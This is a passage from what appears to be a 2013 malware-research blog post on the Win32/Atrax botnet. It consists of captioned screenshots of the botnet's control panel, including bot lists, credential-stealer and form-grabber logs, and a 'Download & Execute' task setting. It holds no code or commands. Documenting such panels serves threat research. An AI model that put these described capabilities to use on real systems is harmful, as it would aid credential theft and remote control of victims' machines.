src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYG9G1Ar5KdrebxYyApNqBCeqY28TrsadSBrkZ8IGSu_ZeSRifFvbH4VV7Q2jXtgYpSUazjCxLuDPwL44ftTqmeI3lq0CabV8usIy_haqCEbQ26Y3TLQsW2wsm-F_Y9yWXYDQME9TErfQ/s400/06-12-2013+17-18-10.png" width="400" /></a></div> <br /> Statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUgPWzQELsSD0955dw8SdEcnWXgJdkmtIWFINx_7vcMajEP_o9T6goyHe488Sn1vYCowjOxcQuOPKQ9Fwmai4HPE6XR_yifxb8phdsW3dD39iYQBzRgKnrpfzSG-VVySbBJQhyphenhyphenT_tm28/s1600/06-12-2013+17-20-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUgPWzQELsSD0955dw8SdEcnWXgJdkmtIWFINx_7vcMajEP_o9T6goyHe488Sn1vYCowjOxcQuOPKQ9Fwmai4HPE6XR_yifxb8phdsW3dD39iYQBzRgKnrpfzSG-VVySbBJQhyphenhyphenT_tm28/s400/06-12-2013+17-20-02.png" width="400" /></a></div> <br /> Plugin statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxYbVo4kWNwLEKkwmqVCOojusRJvGT2-QeqWR3Cl1y7HpA09irR04R12zdcxaHK0FfWSphQCCXdxjSF794-wLWu42gF4zl60QqXQ21Tvf5SiCaNwSD5gdTSY5E0U8yQN8VMzkJBHYps8/s1600/07-12-2013+12-39-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxYbVo4kWNwLEKkwmqVCOojusRJvGT2-QeqWR3Cl1y7HpA09irR04R12zdcxaHK0FfWSphQCCXdxjSF794-wLWu42gF4zl60QqXQ21Tvf5SiCaNwSD5gdTSY5E0U8yQN8VMzkJBHYps8/s400/07-12-2013+12-39-41.png" width="400" /></a></div> <br /> Spreader statistic:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe9Au-6YGOJW5C7cM1dTUhoSV8jqHHcMnFCKZaUsW86FqLHzuujBNqcYIjNZBqAS8P9HaxMnvxYWk7czcWdUKs6VWSGKbHtTruLqjULtTnpVlrXR5zDaTXuq79amjagiF-MRfsiKcXvQ/s1600/07-12-2013+12-41-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe9Au-6YGOJW5C7cM1dTUhoSV8jqHHcMnFCKZaUsW86FqLHzuujBNqcYIjNZBqAS8P9HaxMnvxYWk7czcWdUKs6VWSGKbHtTruLqjULtTnpVlrXR5zDaTXuq79amjagiF-MRfsiKcXvQ/s400/07-12-2013+12-41-23.png" width="400" /></a></div> <br /> Bots:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Yh2JuVK_svYAxnBLYpwj7FSN8LNtm8j0u8_uFQVPDYyWlJay7fLawRs8q6lcswoVx78qg6m5bdwhtceBrLJKCcxdQzxd0HBE7ixNH8hKIdD1-ZiM0P9WQweSSy4VWuqcwNXQYU2T-1U/s1600/06-12-2013+17-21-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Yh2JuVK_svYAxnBLYpwj7FSN8LNtm8j0u8_uFQVPDYyWlJay7fLawRs8q6lcswoVx78qg6m5bdwhtceBrLJKCcxdQzxd0HBE7ixNH8hKIdD1-ZiM0P9WQweSSy4VWuqcwNXQYU2T-1U/s400/06-12-2013+17-21-13.png" width="400" /></a></div> <br /> Bot legend:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir5uyOjUgKZ7oBI2j3woMO9oV8lMmfEKKC3I-JFxgRwRuIIZLyoiAF2kyTZNCkp-d0SCKXJejJPFpIqfG4Ym8OlixREHC2i-LgAlEUx16w70HaeBmvXq5F7rDoiU4fV_5mBy8TJdVm79U/s1600/06-12-2013+17-52-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir5uyOjUgKZ7oBI2j3woMO9oV8lMmfEKKC3I-JFxgRwRuIIZLyoiAF2kyTZNCkp-d0SCKXJejJPFpIqfG4Ym8OlixREHC2i-LgAlEUx16w70HaeBmvXq5F7rDoiU4fV_5mBy8TJdVm79U/s1600/06-12-2013+17-52-56.png" /></a></div> <br /> Bot information:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZkgzSuJJh4GLFiOk3JG6Jh22w_8HAW19AReu6FTzGNUy3esHLFa8NXky-y236PRIcd0IvVRfWOahUtN2y3usFjkaVxRFznKdszVMnTm-Z9rPMMQYF-mZUxApBdL_inlNdk7fjO7XKAgc/s1600/06-12-2013+17-27-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZkgzSuJJh4GLFiOk3JG6Jh22w_8HAW19AReu6FTzGNUy3esHLFa8NXky-y236PRIcd0IvVRfWOahUtN2y3usFjkaVxRFznKdszVMnTm-Z9rPMMQYF-mZUxApBdL_inlNdk7fjO7XKAgc/s400/06-12-2013+17-27-07.png" width="400" /></a></div> <br /> AtraxStealer plugin logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2K9hqXOfc6lG0uM0pDr7bQ3EuVS_-oGjljjWYsMQV1jH-UGrDaverCXLUfZUokR8FSGYTiVKmCyPufoZe1XipJ3egvIGMOSdoxxDJ0BdJTdN5akFoO36_w9XZ2dgzfCjFm_um7EH-XuQ/s1600/06-12-2013+17-29-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2K9hqXOfc6lG0uM0pDr7bQ3EuVS_-oGjljjWYsMQV1jH-UGrDaverCXLUfZUokR8FSGYTiVKmCyPufoZe1XipJ3egvIGMOSdoxxDJ0BdJTdN5akFoO36_w9XZ2dgzfCjFm_um7EH-XuQ/s400/06-12-2013+17-29-00.png" width="400" /></a></div> <br /> Formgrabber plugin logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxpku3IQPfiKnuU77CQMay2pHJOUMjvIlWqkblcF3teCB_wxn2svdwq5pdH8Y3wFjK769F8-eedyOxctnhhWjbUf81wR1GMhrCYA7B5-ZknIVY7J9gWt3PLAbyZBznHlMYA2S6Hhf8tTE/s1600/06-12-2013+17-30-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="365" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxpku3IQPfiKnuU77CQMay2pHJOUMjvIlWqkblcF3teCB_wxn2svdwq5pdH8Y3wFjK769F8-eedyOxctnhhWjbUf81wR1GMhrCYA7B5-ZknIVY7J9gWt3PLAbyZBznHlMYA2S6Hhf8tTE/s400/06-12-2013+17-30-57.png" width="400" /></a></div> <br /> Formgrabber plugin logs detail:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qzKgKQQXznIh4191NgR13hUgiO5gAiIK31h6sRpRrV_yByD1A-_Ssx86-_UdMXfyOO73o_npphPMX6ufkIPjgtSAvhC0LLeSEZtd797mUlj75TglpusPDS_wEZR1q4XOJ9BWtnvFQ8Y/s1600/06-12-2013+17-34-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qzKgKQQXznIh4191NgR13hUgiO5gAiIK31h6sRpRrV_yByD1A-_Ssx86-_UdMXfyOO73o_npphPMX6ufkIPjgtSAvhC0LLeSEZtd797mUlj75TglpusPDS_wEZR1q4XOJ9BWtnvFQ8Y/s400/06-12-2013+17-34-06.png" width="400" /></a></div> <br /> Plugins:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXNc3qoOEyIJNbWNoepmOC7TgZBIgkGkLsEW1zBb4AK3XzIc6Az1HrgXtn2sFpKmXHRRgDTaSc1VmcXsTJPD55VxkL2aU8rBADFePqO_xKUgLDc7KsHYKBweyfNUzekz-VBnBQXdMe2ok/s1600/06-12-2013+17-46-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXNc3qoOEyIJNbWNoepmOC7TgZBIgkGkLsEW1zBb4AK3XzIc6Az1HrgXtn2sFpKmXHRRgDTaSc1VmcXsTJPD55VxkL2aU8rBADFePqO_xKUgLDc7KsHYKBweyfNUzekz-VBnBQXdMe2ok/s400/06-12-2013+17-46-51.png" width="400" /></a></div> <br /> Tasks:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoQJjvKmF6sSj9pYzZ8sryKHSuooPNS0vYYAxiQLbrxMSaw4UlgrUK-Qw-nyuG5AD9bRD2cM6UK0MDKTa3UeC1MOkqt8pp6leADLfBTibWxg99oUpVSmd9MUnbZpRFQdr1YtjsQKwcF4/s1600/06-12-2013+17-47-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoQJjvKmF6sSj9pYzZ8sryKHSuooPNS0vYYAxiQLbrxMSaw4UlgrUK-Qw-nyuG5AD9bRD2cM6UK0MDKTa3UeC1MOkqt8pp6leADLfBTibWxg99oUpVSmd9MUnbZpRFQdr1YtjsQKwcF4/s400/06-12-2013+17-47-19.png" width="400" /></a></div> <br /> Create a new task:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYzkIfvQhCPVxjbRiytUF6pWTLt97z20B4JK50dfjr6tB8iAHeNHjbmmDqI6sz-deHbATCvYh73M0eSPv5GG5tk7kF96EpA4fkSrof9rZn9mT2fNsJzdyyWiRwGcII05Fc6EludsPxoLg/s1600/06-12-2013+17-59-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYzkIfvQhCPVxjbRiytUF6pWTLt97z20B4JK50dfjr6tB8iAHeNHjbmmDqI6sz-deHbATCvYh73M0eSPv5GG5tk7kF96EpA4fkSrof9rZn9mT2fNsJzdyyWiRwGcII05Fc6EludsPxoLg/s1600/06-12-2013+17-59-25.png" /></a></div> <br /> Task setting for 'Download &amp; Execute':<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMEqK7TtLVVFBQkc4wZCbr8f4O-skNKgV4Dckmif2B5l_T_oxF3nnbSxGNDZ9CcWVXva58w-D5Ta7uGACRqI6q5W4RSvk46_0Z-Cm8fUXOnxbvbfFiwgghsbSOsyPi2_13nGsuWwk-lq8/s1600/06-12-2013+18-00-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMEqK7TtLVVFBQkc4wZCbr8f4O-skNKgV4Dckmif2B5l_T_oxF3nnbSxGNDZ9CcWVXva58w-D5Ta7uGACRqI6q5W4RSvk46_0Z-Cm8fUXOnxbvbfFiwgghsbSOsyPi2_13nGsuWwk-lq8/s400/06-12-2013+18-00-31.png" width="378" /></a></div> <br /> Task execution:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiceHDmy3XZC8kV_b_tAVznZp2NPHZjb7ejWeUxhyphenhyphenMvEJc20jwVQroKAHCSlQc2ISCF-rkRdcon4FYtJ56dzGmtVKfgLtDPkDVzuhEuZvgaX7vmukF7MUQGo6lwmJIDjL-VVqUEUpmBXnk/s1600/06-12-2013+17-47-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiceHDmy3XZC8kV_b_tAVznZp2NPHZjb7ejWeUxhyphenhyphenMvEJc20jwVQroKAHCSlQc2ISCF-rkRdcon4FYtJ56dzGmtVKfgLtDPkDVzuhEuZvgaX7vmukF7MUQGo6lwmJIDjL-VVqUEUpmBXnk/s400/06-12-2013+17-47-35.png" width="348" /></a></div> <br /> Edit a task:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rzSYFak5z5iRXu6VjAeCAgTALpUnZqfEMzJ7HY9rKKIw4NXYq8Z1BkhqWnBG2x79axo5d7KeF_ulwux41u-Mr2-zrHEj7veAIxeqc84o_VtDVxeHeaEEvwTV-hqcJzSglFbj-MHuI1E/s1600/06-12-2013+17-48-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rzSYFak5z5iRXu6VjAeCAgTALpUnZqfEMzJ7HY9rKKIw4NXYq8Z1BkhqWnBG2x79axo5d7KeF_ulwux41u-Mr2-zrHEj7veAIxeqc84o_VtDVxeHeaEEvwTV-hqcJzSglFbj-MHuI1E/s400/06-12-2013+17-48-01.png" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQckq1Fb2XtV56vfhvBD2dvofGhM6O-7LBBZdmwkjdJXGjkD4vsDdXfIe5jNOGJQkdonsQXzErZzrvsQbhroxIzvlKwGkwzRuRCXpHfLcN9ChPVYyRBcfijggHE7Zn_0g1nSPE-u1NpHs/s1600/06-12-2013+17-51-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQckq1Fb2XtV56vfhvBD2dvofGhM6O-7LBBZdmwkjdJXGjkD4vsDdXfIe5jNOGJQkdonsQXzErZzrvsQbhroxIzvlKwGkwzRuRCXpHfLcN9ChPVYyRBcfijggHE7Zn_0g1nSPE-u1NpHs/s400/06-12-2013+17-51-14.png" width="400" /></a></div> <br /> <br /> <br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihWRm5z5Jl0jlIUF4RdQMr9N69_JG6LW548kLriPvC586NF1BzhVsaj0DqMi03KOEVo_jZXOag4amxgQKHf-NAB4m1Hm5oV6FVmWj7PN9MO4UmVfJjllsvR6otBu-Fz1EEU7lZ8Wt8ec/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihWRm5z5Jl0jlIUF4RdQMr9N69_JG6LW548kLriPvC586NF1BzhVsaj0DqMi03KOEVo_jZXOag4amxgQKHf-NAB4m1Hm5oV6FVmWj7PN9MO4UmVfJjllsvR6otBu-Fz1EEU7lZ8Wt8ec/s400/1.jpg" width="400" /></a></div> https://www.xylibox.com/2013/12/win32atraxa.htmlnoreply@blogger.com (Steven K)11